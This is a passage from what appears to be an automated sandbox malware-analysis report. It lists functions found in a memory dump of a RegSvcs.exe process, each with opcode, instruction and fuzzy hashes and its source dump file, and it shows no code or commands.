                                                                  • API String ID:
                                                                  • Opcode ID: 5f883ee5cd4918423aaf83ff07e973f3c6cd8e6ab577fb694a2242c19127c264
                                                                  • Instruction ID: 1125a33f9c88961ba9e2c91ec9de6dd0133fd4e12a64fff8f02c648b2d92addc
                                                                  • Opcode Fuzzy Hash: 5f883ee5cd4918423aaf83ff07e973f3c6cd8e6ab577fb694a2242c19127c264
                                                                  • Instruction Fuzzy Hash: DC01A970240781DBE3239B6CCD48F35B7D4FB54F04F944198BA01DB7EAD768D4418618
                                                                  Function 0173437C Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                  • Instruction ID: 0e1b45f89c6a1cea530293e2585552b181d5afbf110381cf5a7f26933e0fb03e
                                                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                  • Instruction Fuzzy Hash: 86F02E32341D1347EB3EAA2D8810B3EF656AFD0E40B05052C9683EB641DF20DC00C780
                                                                  Function 0171E872 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                  • Instruction ID: 6971bf744228735a3b4438727977fad05bd0ee4d7aae7f36926e45cd0d916bb1
                                                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                  • Instruction Fuzzy Hash: F1F08933B916119FD3329A4DDC80F16F769EFD5A60F591079AE059B268CB60EC41CBD0
                                                                  Function 0171C89D Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f6e7dfac38c782a48c9ce9f5708e6cf259883f2b409eea706f05201754556fc
                                                                  • Instruction ID: df320c10b718d12b767c9aae3b6b58505aba26307f46fb51338e105970476ae6
                                                                  • Opcode Fuzzy Hash: 7f6e7dfac38c782a48c9ce9f5708e6cf259883f2b409eea706f05201754556fc
                                                                  • Instruction Fuzzy Hash: 66F0AF71A553049FC310EF68C945A1AB7E4FF98710F40865EBC98DB394EA34E900CB9A
                                                                  Function 016C0854 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                  • Instruction ID: 39cd89f46e6de76555553d002653843c8b9b83541dc648c588248612c12b45a4
                                                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                  • Instruction Fuzzy Hash: 3EF09072611204EEE714DB25CC01F66B6EAEF98744F25C068A545D72A4EAB0DD01C654
                                                                  Function 0171C912 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5abb2d7d78b905259b99d640d1982b728a07b11082e5c09aef2a329b21b3f824
                                                                  • Instruction ID: fe7167a5ddea4da045f64a8d9030bf139d76ffb9e17655d0bea4f03ebfd3a865
                                                                  • Opcode Fuzzy Hash: 5abb2d7d78b905259b99d640d1982b728a07b11082e5c09aef2a329b21b3f824
                                                                  • Instruction Fuzzy Hash: 8AF06270A01249DFCB04EFA9C515A5EB7B5FF18300F10806AB955EB395DA38EE01CB94
                                                                  Function 016947FB Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0fa4bda975e4a12fe61ec2d098660d6b5442500cfb6882c9c17adf04fa0e39e2
                                                                  • Instruction ID: c1407709326fc31ac60b80d14b1f230af0ed27d9fba3ea88fed0c2becdaf6d07
                                                                  • Opcode Fuzzy Hash: 0fa4bda975e4a12fe61ec2d098660d6b5442500cfb6882c9c17adf04fa0e39e2
                                                                  • Instruction Fuzzy Hash: E4F0B4319166D19FEF32CB5CCF44B21BBDC9B01660F0A4D6AD54A8F602DF24D882C650
                                                                  Function 01750115 Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01b9924cb9aabc61f555e457f891b7aac205141f86539e6f6b23111f5b339126
                                                                  • Instruction ID: 3522b4f1a69afd20a67342829d2b0b6ae7342d8bcf3cf153a12abc0f709f21cf
                                                                  • Opcode Fuzzy Hash: 01b9924cb9aabc61f555e457f891b7aac205141f86539e6f6b23111f5b339126
                                                                  • Instruction Fuzzy Hash: 58F05C2645A6C017CF726B3C74583DDFF55A752324F2A1489FCE05B209D6B48883C366
                                                                  Function 016CC5ED Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8244ed67a58bfc41d27f6319776b9e53017587f6b0abc973c8ed0135764b40cc
                                                                  • Instruction ID: 8409944602ae99a869f28d7a7210038c0891b979b683b11f349586cec9365f46
                                                                  • Opcode Fuzzy Hash: 8244ed67a58bfc41d27f6319776b9e53017587f6b0abc973c8ed0135764b40cc
                                                                  • Instruction Fuzzy Hash: 43F0BE725116719BE3229A2ECA48B31BBD8DB45EA1F08942DD40A87612C364E881CA50
                                                                  Function 016D2619 Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                  • Instruction ID: 8284b21560537c2436abda9a33af392b1cc7531b98607fe07ce9a504c8e7e1eb
                                                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                  • Instruction Fuzzy Hash: 93E0D8327006412BE7219E598CD0F57776FEFD2B10F04407DB6045F252CAE2DC0986A8
                                                                  Function 01726030 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                  • Instruction ID: cf7ac776eb74f4b2bc350df8d8e57404245a92bae6182d8bf0dc0eee92a029a9
                                                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                  • Instruction Fuzzy Hash: EFF08C721002149FE3218F09D840F62B7B8EB05364F41C06AEA098B161D339EC41DBA4
                                                                  Function 01690710 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                  • Instruction ID: 98a4c2fac84dbc4b5503c15a18e8499c217cfe26442037cfd1601272fb667497
                                                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                  • Instruction Fuzzy Hash: ECF0E53A204741DBDF16DF19D840AA97BECFB45360F040094F8468B301E732E982CF94
                                                                  Function 016C49D0 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                  • Instruction ID: 313a3c1cc60a338fa8f57f283d775d4bc20945c4ab626bb62ac31f6d89a28064
                                                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                  • Instruction Fuzzy Hash: FBE0D8322441C5ABD3219A9D8C10B7677A6EBD0FA0F15042DEA028B258DF70DC41C7DC
                                                                  Function 01764164 Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d93b967a65c2a63fdff878b8c57266a2f3e13db8e35ba0988d69385b1a254ee9
                                                                  • Instruction ID: a36e7f01c4558524d50380d0a5f6739fbf01c6a54f40acf77c18fec84271f5df
                                                                  • Opcode Fuzzy Hash: d93b967a65c2a63fdff878b8c57266a2f3e13db8e35ba0988d69385b1a254ee9
                                                                  • Instruction Fuzzy Hash: 2BF0E531A25591CFE77AD72CD944B52B7EAAB51630F0A1554D80287912C324DC80C690
                                                                  Function 0173678E Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                  • Instruction ID: 2a9ae135abf400701b33720073b246ab3517d1a290dfbd2517b1cd792ade3dc5
                                                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                  • Instruction Fuzzy Hash: 19E0DF32A00110BBDB22A7998D01F9ABEADEB90EA0F450058B602E7090E530EE00DAA0
                                                                  Function 017608C0 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                  • Instruction ID: f17bd3a8b0bbdfcb9be6b14c2fb36171e34a2b9d0ba878a808381674f850804c
                                                                  • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                  • Instruction Fuzzy Hash: ABE09B316803518FCB25CA1EC144A53F7ECDFF56A0F1980A9ED0547612C271F842C6D0
                                                                  Function 016925E0 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 9ad3a8bf46fba0923b99c62818a6d4a4934978ab4fcdcfab38397d576a0f93c8
                                                                  • Instruction ID: a9b200d42c15331589a1b2ca17c0928ae923c337d2879985fbaa84f2457d02f2
                                                                  • Opcode Fuzzy Hash: 9ad3a8bf46fba0923b99c62818a6d4a4934978ab4fcdcfab38397d576a0f93c8
                                                                  • Instruction Fuzzy Hash: D5E09272100594ABC721BB29DD11F8A77ABEF61364F11451DB15557190CB30AC11C7C8
                                                                  Function 0174A456 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                  • Instruction ID: af39847d106351e97990f3311a9717ed2560f4afe36219a973c38faccd38d256
                                                                  • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                  • Instruction Fuzzy Hash: FCE09231050611DFE7326F2ECC48B96BAE2FF60711F148C2CA09B125B0C7B598C1CB44
                                                                  Function 01714000 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                  • Instruction ID: 3e02e5e610b8d0e8e32b791e8fd760c86580f20c45349aa4477c411c8fd3579c
                                                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                  • Instruction Fuzzy Hash: 41E0C2343003058FE715CF1EC050B62BBB6BFD5B10F28C0A8A9498F209EB32E882CB40
                                                                  Function 016CCA38 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3f1eaf07b1dff66a8708616b715c731c0725d726c1c710631473df82521cda41
                                                                  • Instruction ID: 2a7f3a5f9ca75fdad2dc186ab82163f280c25a9e56a7f1dad8e9d9efedfecbcd
                                                                  • Opcode Fuzzy Hash: 3f1eaf07b1dff66a8708616b715c731c0725d726c1c710631473df82521cda41
                                                                  • Instruction Fuzzy Hash: 17D02B324C54306ACB39E15CBC08FF73A5AEB40B20F018868FA0CD2011D524CC8187C8
                                                                  Function 0168823B Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                  • Instruction ID: 1fa28b9f7e24165434215248931c88d16d07e0d2e12768ebb3ffab2811b48ed1
                                                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                  • Instruction Fuzzy Hash: FCE0C231801A20EFDB323F15DC20F5176AAFF94B10F508A2DE0820B1A487B0AC82CB88
                                                                  Function 01692050 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0cbb9bda0c965efeafd2c67c0f9d9f2012daceeb4638dd24e427c0ff4d76d0df
                                                                  • Instruction ID: 33c00d1a642b8ab288b02eaf8ef51c97bf57052853bd75c38521ccffd2de5bf9
                                                                  • Opcode Fuzzy Hash: 0cbb9bda0c965efeafd2c67c0f9d9f2012daceeb4638dd24e427c0ff4d76d0df
                                                                  • Instruction Fuzzy Hash: 89E0C2322004A07BC711FB5DDD10F4A73AFEFA5370F104129F15187690CA20AC01C7D8
                                                                  Function 016E6AA4 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                  • Instruction ID: 4c61a1e79456c8753729ead995f4dbabcda257222251726ea1eea4f18b5feb11
                                                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                  • Instruction Fuzzy Hash: 6CD05E36911A50AFC3329F1BEE04C13FBFAFBD4A10705062EA54683A20C770AC06CBA0
                                                                  Function 016CE59C Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                  • Instruction ID: 37c1778d52053a009944bc5bf797ae127d5f2e477742ee443128c7bd81e50fa2
                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                  • Instruction Fuzzy Hash: 1DD0A732504610AFD732AA1CFC00FC373D9BB48720F050459B009C7151C360AC41CA44
                                                                  Function 0170E908 Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                  • Instruction ID: fd02dbb6349a062aed8f6bfa9b645dbcd085fdb63a3be737acb6c51ba00d2f12
                                                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                  • Instruction Fuzzy Hash: 98E0EC35960784EFDF13DF99CA40F5AFBFABB94B40F150458A1085B660C625AD01CB40
                                                                  Function 0168A0E3 Relevance: .0, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                  • Instruction ID: 507b413c65391510e30a516e3e81d9559493f9ad94fbc47a26a84a9d6ee84741
                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                  • Instruction Fuzzy Hash: D9D02232212030A7CB2866956C00F63B906AB80A94F0A012E380A93A00C1048C43C6E0
                                                                  Function 016CA830 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                  • Instruction ID: 12349ed6c80d33a110919ac5cff4fc78ec2cdf44794fc856d56f9cffcf7649a8
                                                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                  • Instruction Fuzzy Hash: BFD012371D054DBBCB119F66DC01F957BAAE764BA0F444020B505875A0C63AE950D984
                                                                  Function 016CCA24 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3343d1c9b93ca9425ccd29bc3d60f43eb4cae73e63d86b46b553d831791e2229
                                                                  • Instruction ID: b0075cb0c798e7db8b30030cf9c331e26dabbc5c34edb15f9d2bd7a3e577817c
                                                                  • Opcode Fuzzy Hash: 3343d1c9b93ca9425ccd29bc3d60f43eb4cae73e63d86b46b553d831791e2229
                                                                  • Instruction Fuzzy Hash: FBD05230A41202EBDF2BCF88CE14A3EBAB1EB10B40B94006CFA0192220E328DC028A00
                                                                  Function 016A02A0 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                  • Instruction ID: 6f0233826bb4a4f7482f120f74ebc74e27d367c1b6753e1d75716541176ac13c
                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                  • Instruction Fuzzy Hash: E6D09235212A80CFD62A8B0DC9A4B1633A4BB45A44FC14490E501CBB22D728D940CE00
                                                                  Function 016CC700 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                  • Instruction ID: 1ea0a8f021bf6599a2e6bd7cf9a3933f58f229224c4d82b6ab89f9170219a06a
                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                  • Instruction Fuzzy Hash: 5AC01232150644AFC7119A95CD01F0177AAE798B40F400021F20547670C531EC10DA44
                                                                  Function 016B0310 Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                  • Instruction ID: df967131ed8df3e1bd40a224c11ac22fc82bcf0fca52918fa936e8b3caedd114
                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                  • Instruction Fuzzy Hash: 8BD01236100249EFCB11DF41C890D9B7B3BFBD8710F108019FD19076108A31ED62DB50
                                                                  Function 01690750 Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                  • Instruction ID: 18034b5f5b9d72f35d236eec745c8ea3b89080c82d352b34b6452e916e0ccc12
